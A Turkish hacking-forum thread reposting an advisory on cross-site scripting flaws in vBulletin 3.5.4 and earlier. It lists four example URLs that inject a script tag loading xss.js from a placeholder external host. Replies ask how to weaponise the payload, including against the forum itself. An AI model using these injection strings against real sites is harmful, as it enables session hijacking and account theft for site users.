vBulletin Multiple Cross-Site Scripting Vulnerabilities

Yuc3L

Yuc3L

New member
Katılım
20 Haz 2005
Mesajlar
1,213
Reaction score
0
Puanları
0
Konum
Morg!
vBulletin Multiple Cross-Site Scripting Vulnerabilities

Risk : yüksek
Etki : Kod açıklarından yararlanarak sistem saldırılar düzenleme.
Etkilenenler : vBulletin 3.5.4 dahil olmak üzere tüm versiyonları

Çözüm : Henüz Yok
Referans : vBulletin Resmi Forumu
Kaynak : SecurityFocus Güvenlik Şirketi

PHP: 
http://www.example.net/gettingInvolved.html?s=">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"
http://www.example.net/forums/register.php?s=\\">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"&action=signup
http://www.example.net/forums/member.php?action=editprofile&s=">">">">'>'>'><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<'<'
http://www.example.net/library/index.html?s=questions">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"


edit: keşke "GuvenLik açıkLarı // Vulnerabilities" kısmına yazsaymısım =P
 
Yuc3L' Alıntı:
vBulletin Multiple Cross-Site Scripting Vulnerabilities

Risk : yüksek
Etki : Kod açıklarından yararlanarak sistem saldırılar düzenleme.
Etkilenenler : vBulletin 3.5.4 dahil olmak üzere tüm versiyonları

Çözüm : Henüz Yok
Referans : vBulletin Resmi Forumu
Kaynak : SecurityFocus Güvenlik Şirketi

PHP: 
http://www.example.net/gettingInvolved.html?s=">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"
http://www.example.net/forums/register.php?s=\\">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"&action=signup
http://www.example.net/forums/member.php?action=editprofile&s=">">">">'>'>'><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<'<'
http://www.example.net/library/index.html?s=questions">">">">">"><SCRIPT%20SRC=http://www.example.com/xss.js></SCRIPT><"<"<"<"


edit: keşke "GuvenLik açıkLarı // Vulnerabilities" kısmına yazsaymısım =P
Genişletmek için tıkla ...


hocam çok teşekkürler. ama acaba kullanımını anlatabilir misin?
 
expamle bilmem ne jss yazıor ya oraya ne yapcaz black code mi koycaz oraya ama jss black code var mı elinizide ben bunu milw0rm da da görmüştüm ama oraya takıldım işte
bi cevap verseniz çok güzel olcak
yayınlayan aradaş hiç denedi bunu acaba
burası da 3.5.4 burayada olcak mı yani
:D
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst